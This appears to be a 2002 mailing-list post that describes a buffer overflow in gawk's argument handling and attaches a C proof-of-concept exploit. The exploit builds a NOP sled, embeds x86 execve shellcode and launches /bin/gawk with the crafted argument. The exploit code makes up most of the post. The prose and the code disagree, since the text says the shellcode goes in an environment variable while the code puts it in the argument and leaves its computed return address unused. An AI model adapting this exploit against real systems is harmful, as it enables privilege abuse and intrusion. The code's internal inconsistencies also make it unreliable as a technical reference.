From: Gabriel A. Maggiotti (gmaggiot ciudad.com.ar)
Date: Fri Mar 15 2002 - 12:24:21 CST

I did a little research and found that it only accepts ASCII chars as arg,
and if you try to put a shellcode in the arg nothing occurs.
I think if we store the shellcode in an env variable and write the ret
address pointing to the env shellcode, it could work. I attach a proof I made.

/*
---------------------------------------------------------------------------
Web: http://qb0x.net        Author: Gabriel A. Maggiotti
Date: March 15, 2002        E-mail: gmaggiot ciudad.com.ar
---------------------------------------------------------------------------
*/
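#include <stdio.h>
#include <string.h>   /* memcpy, strlen */
#include <unistd.h>   /* execl */

#define OFFSET 18215
#define NOP 0x90
#define RET_72 0xbfffc6f0
#define RET 0x41

int
main(int argc, char *argv[])
{
    int i=0; char buf[OFFSET];
    int c, ret;
    char shellcode1[] =
    "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
    "\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69/bin/ls";

    ret = RET_72 - OFFSET;

    /* fill the argument buffer with NOP bytes */
    for(i=0;i<=OFFSET-1 ;i++)
        buf[i]=NOP;

    /* placeholder return value (0x41) written after the padding */
    *(int *) &buf[i] = RET;

    /* copy the shellcode into the padding at offset 131 */
    memcpy(buf+131,shellcode1,strlen(shellcode1));

    /* the buffer starts with "-f " and is handed to gawk as one argument */
    buf[0]='-';
    buf[1]='f';
    buf[2]=' ';
    execl("/bin/gawk", "/bin/gawk", buf, NULL);
    //puts(buf);
    return 0;
}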